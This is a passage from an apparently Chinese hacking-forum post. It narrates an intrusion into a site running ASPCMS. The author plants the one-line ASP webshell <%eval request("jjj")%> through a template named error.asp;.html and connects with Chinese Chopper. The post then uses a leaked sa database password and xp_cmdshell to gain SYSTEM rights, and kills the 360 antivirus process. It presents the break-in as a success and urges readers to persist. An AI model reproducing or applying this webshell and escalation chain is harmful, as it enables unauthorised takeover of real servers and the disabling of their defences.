图1
在后台晃了半圈硬是没能找到拿shell的地方,在aspcms的官网看了一下,貌似这个站用的是最新版的,百度谷歌都没找到拿shell的方法。真是让小菜欲哭无泪啊,难道今天真的要无功而返?!有点儿不甘心,于是在地址栏再次输入后台地址 http://www.xxxx.com.cn/xitongban/admin,这下小菜我眼睛发亮了,网页上出现了一个“界面风格”的选项,运气好的话可以直接添加模板拿shell了!这点小菜要说一下,其实是我自己粗心,登录后台默认的是简单版,如果登录的时候选择全功能版的话也会有“界面风格”的选项,如图2。
图2
这下就是拿shell了,点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,文件内容写一句话<%eval request("jjj")%>。然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,菜刀连接之。上传一个cmd,执行“whoami”看一下权限,network权限,那就要想办法提权了。用systeminfo查看一下系统信息,光是补丁都打了200多个,太囧了,看来不能用exp提权了。tasklist看一下进程,看到了显眼的ZhuDongFangYu.exe,原来是360在作祟。
传一个aspx的马试试,因为aspx的权限一般要大一些,看了一下权限,还是network权限。刚才tasklist看到了sqlservr.exe进程,可以用sql来试一下提权,找到连接字符串就提权有望了。在根目录找到了配置文件,找到了连接字符串,小菜运气太好了,竟然是sa权限,sa的密码是200606。在菜刀的数据库管理的配置中填好连接字符串,直接连接,哈!数据库出来了!用sql的xp_cmdshell执行以下命令试试,EXEC master..xp_cmdshell 'whoami' ,竟然返回了一大堆乱码,不知为何,有上传了一个asp的马,填上sa用户名和密码,再来执行一下命令whoami,返回的是ntauthoritysystem,现在已经是系统权限了,提权成功!执行命令taskkill -f -im ZhuDongFangYu.exe,再看一下进程,主动防御的果然被关掉了,小菜我就不帮管理员重启主动防御了。此次入侵圆满结束。
总结一下,这次入侵还是走了一些弯路,比如说拿shell的时候被后台默认的index_user.asp页面所迷惑,不过还好及时发现。还有在用菜刀的xp_cmdshell执行命令的时候不成功,小菜没有就此放弃,最后使用网马提权成功!在渗透的过程中,我们需要勇于尝试,多多尝试,一定会拿到我们想要的!
| 
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
